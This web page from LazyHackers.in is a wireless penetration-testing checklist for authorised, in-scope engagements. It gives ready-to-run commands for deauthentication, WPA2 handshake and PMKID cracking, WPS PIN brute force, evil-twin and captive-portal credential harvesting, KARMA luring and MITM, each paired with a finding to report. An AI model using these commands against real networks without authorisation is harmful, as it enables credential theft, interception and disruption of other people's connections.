LazyHackers.in — Checklist
📶 Wireless Pentest Checklist
Wi-Fi deep-dive, item by item: scenario · command · steps · the finding · the fix
☰ How to use this guide
Wireless extends the network past the walls. The work splits by encryption type: WEP is instant, WPA2-PSK is a handshake/PMKID capture cracked offline, WPA3 resists that (so you look for downgrade), and Enterprise (802.1X/EAP) is owned by an evil twin that relays or captures credentials. The deeper questions are client-side (probe/karma) and segmentation (does guest reach corporate?). This guide turns every item into how-to-test. For what an attacker does after joining, pair with the Network checklist.
# Monitor mode + survey
airmon-ng check kill ; airmon-ng start wlan0
airodump-ng wlan0mon # list APs/clients, encryption, channels
# (wifite automates much of the capture/crack flow)
wifite --kill0 Survey & recon
Map every SSID/BSSID, its encryption, channel and clients — plus hidden SSIDs and rogue/unauthorised APs.
airodump-ng wlan0mon --band abg # full 2.4/5GHz survey
kismet -c wlan0mon # rich passive survey + rogue detection
# Target a single AP to see clients + capture
airodump-ng -c <ch> --bssid <AP> -w cap wlan0monSurvey & recon — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| All SSIDs/BSSIDs/encryption/channels | airodump-ng survey | Wireless inventory |
| Connected clients enumerated | airodump-ng per AP | Client inventory |
| Hidden SSID revealed | observe probes/deauth | Hidden SSID disclosure |
| Rogue/unauthorised AP | kismet / inventory diff | Rogue access point |
| Signal leakage beyond perimeter | site survey | Signal over-coverage |
1 WEP & WPA2-PSK
WEP is broken outright. WPA2-PSK is cracked offline after capturing the 4-way handshake (deauth a client to force it) or the PMKID (clientless, often faster).
WPA2-PSK: handshake & PMKID
- Capture the 4-way handshake on the target AP's channel; deauth a connected client to force a re-handshake.
- Or capture the PMKID directly (no client needed) with hcxdumptool.
- Crack offline with hashcat against a wordlist/rules; weak/seasonal passphrases fall fast.
# Handshake capture + forced deauth
airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon
aireplay-ng -0 5 -a <AP> -c <client> wlan0mon # deauth -> handshake
# PMKID (clientless)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack (handshake & PMKID share mode 22000)
hashcat -m 22000 hash.hc22000 rockyou.txt -r rules/best64.ruleWEP / WPA2-PSK — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| WEP encryption in use | survey + aircrack | WEP encryption |
| WPA2 handshake captured | airodump + deauth | Handshake capture |
| PMKID captured (clientless) | hcxdumptool | PMKID capture |
| Weak PSK cracked offline | hashcat -m 22000 | Crackable WPA2 passphrase |
| PSK reused across APs/sites | compare cracked PSKs | Reused pre-shared key |
| No 802.11w (deauth works) | deauth test | No management-frame protection |
2 WPA3
WPA3-SAE resists offline cracking, so the focus shifts to transition-mode downgrade (forcing WPA2) and known SAE implementation flaws (Dragonblood).
WPA3 — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Transition-mode downgrade to WPA2 | rogue WPA2 + capture | WPA3 downgrade |
| Dragonblood SAE weakness | version/patch check | Dragonblood vulnerability |
| Side-channel / timing on SAE | patch check | SAE side-channel |
| 802.11w not enforced | deauth test | Management-frame protection gap |
3 WPS
WPS (push-button/PIN) is a long-standing weakness: the PIN is brute-forceable (online and offline Pixie-Dust).
reaver -i wlan0mon -b <AP> -vv # online PIN brute
bully wlan0mon -b <AP> -p <pin>
# Pixie-Dust (offline, fast on vulnerable chipsets)
reaver -i wlan0mon -b <AP> -K 1WPS — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| WPS enabled | wash / survey | WPS enabled |
| WPS PIN online brute | reaver/bully | WPS PIN brute force |
| Pixie-Dust offline attack | reaver -K | Pixie-Dust vulnerability |
| No lockout on PIN failures | observe behaviour | No WPS lockout |
4 Enterprise 802.1X / EAP
WPA2/3-Enterprise authenticates per-user via 802.1X/EAP. The classic attack is an evil twin that impersonates the RADIUS endpoint and captures MSCHAPv2 credentials — possible when clients don't validate the server certificate.
- Stand up a rogue AP with the same SSID and an EAP server that captures credentials.
- If clients don't validate the server cert (or trust any), they hand over the identity + MSCHAPv2 challenge/response.
- Crack the captured MSCHAPv2 offline (or relay it).
# Evil twin that harvests EAP creds
eaphammer --cert-wizard # one-time cert
eaphammer -i wlan0 --essid CorpWiFi --channel 6 --auth wpa-eap --creds
# or hostapd-wpe (logs username + MSCHAPv2 challenge/response)
hostapd-wpe hostapd-wpe.conf
asleap -C <challenge> -R <response> -W rockyou.txt # crack MSCHAPv2Enterprise 802.1X / EAP — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Clients do not validate server cert | eaphammer evil twin | No server-cert validation |
| PEAP/MSCHAPv2 creds captured | hostapd-wpe + asleap | EAP credential theft |
| Weak EAP method (no EAP-TLS) | review config | Weak EAP method |
| Supplicant trusts any/added CA | rogue cert test | Permissive supplicant trust |
| Identity exposed in outer EAP | capture identity | EAP identity disclosure |
5 Rogue AP / evil twin / captive portal
Beyond Enterprise, a same-SSID rogue AP (optionally with a fake captive portal) harvests PSK-network credentials and MITMs clients that auto-connect.
# Evil twin + captive portal credential harvest
eaphammer -i wlan0 --essid FreeWiFi --captive-portal
# or airgeddon / wifiphisher for guided evil-twin + portal flows
# bettercap for on-path MITM once clients associate
bettercap -iface wlan0Rogue AP / evil twin / captive portal — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Same-SSID evil twin | eaphammer/airgeddon | Evil-twin attack |
| Captive-portal credential phishing | wifiphisher portal | Captive-portal phishing |
| Clients auto-connect to rogue | observe association | Auto-join to rogue AP |
| On-path MITM after association | bettercap | Wireless MITM |
| No WIPS / rogue containment | review controls | No rogue detection |
6 Client-side attacks
Clients leak their preferred networks via probe requests; KARMA-style attacks answer those probes to lure clients onto a rogue AP without touching the real one.
# Harvest probed (preferred) SSIDs
airodump-ng wlan0mon # watch 'Probes' column
# Respond to any probe (KARMA) to lure clients
eaphammer -i wlan0 --essid ANY --karmaClient-side attacks — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Clients leak preferred SSIDs (probes) | airodump probes | Preferred-network leakage |
| KARMA / auto-join to rogue | eaphammer --karma | KARMA association |
| Open-network auto-join | observe behaviour | Open-network auto-join |
| Client connects despite cert error | rogue cert test | Client trust bypass |
7 Segmentation
Once on the wireless, what can you reach? Guest must not reach corporate, and wireless clients shouldn't freely reach the wired internal network.
# From the guest/wireless network, test reach into corporate/internal
nmap -sS -p 22,445,3389,1433 -Pn <corporate-host>
# Client isolation check: can you reach another wireless client?
ping <another-wireless-client-ip>Segmentation — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Guest → corporate reachable | nmap from guest | Guest-network isolation break |
| Wireless → wired internal over-permitted | reachability test | Wireless-to-wired exposure |
| No client (station) isolation | ping peer client | No client isolation |
| Guest reaches management plane | probe mgmt | Management reachable from guest |
B Bluetooth / BLE
If Bluetooth/BLE devices are in scope: discovery, weak/just-works pairing, unauthenticated GATT characteristics, and sniffable traffic.
bluetoothctl ; hcitool lescan # discovery
# Enumerate BLE services/characteristics
gatttool -b <MAC> -I -> primary ; char-desc ; char-read-hnd <handle>
# bettercap BLE module for scan/enumerate/write
bettercap -eval "ble.recon on"Bluetooth / BLE — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Device discoverable / over-advertising | lescan | Excessive BLE advertising |
| Weak/Just-Works pairing | pairing analysis | Weak BLE pairing |
| Unauthenticated GATT read/write | gatttool char-read/write | Unauthenticated characteristic |
| Sniffable/unencrypted BLE traffic | BLE sniffer | Unencrypted BLE |
| Static MAC (trackable) | observe address | No address randomisation |
✓ Coverage map & how to run it
Survey first, then take the encryption path that applies; always check client-side and segmentation; add BLE if in scope.
| Section | Run on | Focus |
|---|---|---|
| Survey 0 | Every engagement | Inventory, rogue/hidden detection |
| WEP/WPA2-PSK 1 | PSK networks | Handshake/PMKID crack |
| WPA3 2 | WPA3 networks | Downgrade, Dragonblood |
| WPS 3 | WPS-enabled APs | PIN brute / Pixie-Dust |
| Enterprise 4 | 802.1X networks | Evil twin, cert validation, EAP creds |
| Rogue/client/segmentation 5–7 | Every engagement | Evil twin, KARMA, isolation |
| Bluetooth/BLE | If in scope | Pairing, GATT, sniffing |
Core principle: the encryption type decides the attack — PSK is an offline crack, Enterprise is an evil-twin credential capture, WPA3 is a downgrade hunt. But the highest business impact is usually segmentation: prove (or break) guest↔corporate isolation, because joining the Wi-Fi is only useful if it reaches something. Tick a box only when you've actually run the test, in scope.